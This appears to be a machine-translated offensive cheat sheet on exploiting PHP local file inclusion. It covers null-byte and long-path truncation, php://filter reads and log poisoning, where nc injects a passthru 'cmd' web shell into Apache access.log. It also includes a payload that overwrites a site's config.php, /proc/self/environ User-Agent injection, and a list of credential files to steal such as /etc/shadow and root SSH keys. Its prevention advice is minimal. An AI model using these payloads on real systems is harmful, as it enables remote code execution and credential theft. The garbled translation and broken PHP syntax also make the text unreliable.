IFI Use Tips

The terms of use of the file with suffix after include:

(1) Gpc=off or%00 will become a

(2)php < 5.3.4 I have not successfully tested in 5.4.4, see cve-2006-7243 for details

Include must have the relevant permissions, Apache users and access to the file at least to achieve the same set of permissions.

Truncation Method:

(1)%00,gpc=off

(2) long file name, Linux more than 4096 bytes will be truncated PHP, no experimental Success (5.2.8), Windows 259 bytes, no attempt, there is no relationship with GPC. Used under Linux: /.. /.. /.. /.. /etc/passwd/./././././././, Windows uses ..., downstairs the connection test was successful, or the same as Linux.

Tips for including files:

1, including uploaded files, such as pictures, documents, etc.

2,data://Php://input and other pseudo-protocols, need to Allow_url_include=on

3, log file, Access.log, through NC to remove the header, to prevent the space is encoded as%20.

[Email protected]:/var/log/apache2# NC 127.0.0.1 80

GET/<?php passthru ($_get[' cmd ');?> http/1.1

View Access.log with logs:

127.0.0.1--[09/apr/2015:03:53:21-0400] "[Email protected]:/var/log/apache2# nc-h" 400 582 "-" "-"

127.0.0.1--[09/apr/2015:03:53:45-0400] "GET/<?php passthru ($_get[' cmd ']);?> http/1.1" 404 480 "-" "-"

Then directly load the log, if the log is large, you can write a sentence to create a file or something, execute once to get the shell

eg

<, $fp =fopen ("/homeirtual/www.xxx.com/forum/config.php", "w+") fputs ($fp, "<span style=" font-family:arial, Helvetica, Sans-serif; " ><?php echo hacked? ></span><span style= "Font-family:arial, Helvetica, Sans-serif;" > "); fclose ($FP);? ></span>

User-agent can be changed in 4,/proc/self/environ

(1): About:config after adding general.useragent.override, Value fill <?phpinfo (); >, or use useragent switch

During the test, either there is no permission, or the User-agent field is not read in this file

5,session file

6, other files created by PHP or something

More elegant read-out files:

https://10.20.30.50/fi?file=php://filter/read=convert.base64-encode/resource=. /.. /.. /.. /.. /etc/passwd%00

Test whether the folder exists:

.. /.. /.. /.. /.. /.. /var/www/dossierexistant/. /.. /.. /.. /.. /etc/passwd%00

For directory traversal, read permissions are required:

/var/lib/locate.db

/var/lib/mlocate/mlocate.db

/usr/local/apache2/conf/httpd.conf

Have root privileges:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (file identifier)

/proc/mounts

/proc/config.gz

How to prevent:

(1) GPC

(2) Readdir restrictions

(3) Of course it cannot be dynamically included

File_exists,move_uploaded_files,file_get_contents are affected.

The remote file contains:

(1) Allow_url_include=on,allow_url_fopen=on

Can be used to truncate

The PHP protocol can be used to read the file, so that it can contain PHP files, haha, or the inclusion of PHP files are executed.

Reference:

Http://www.joychou.org/index.php/web/truncated.html

https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

http://drops.wooyun.org/tips/3827

IFI Use Tips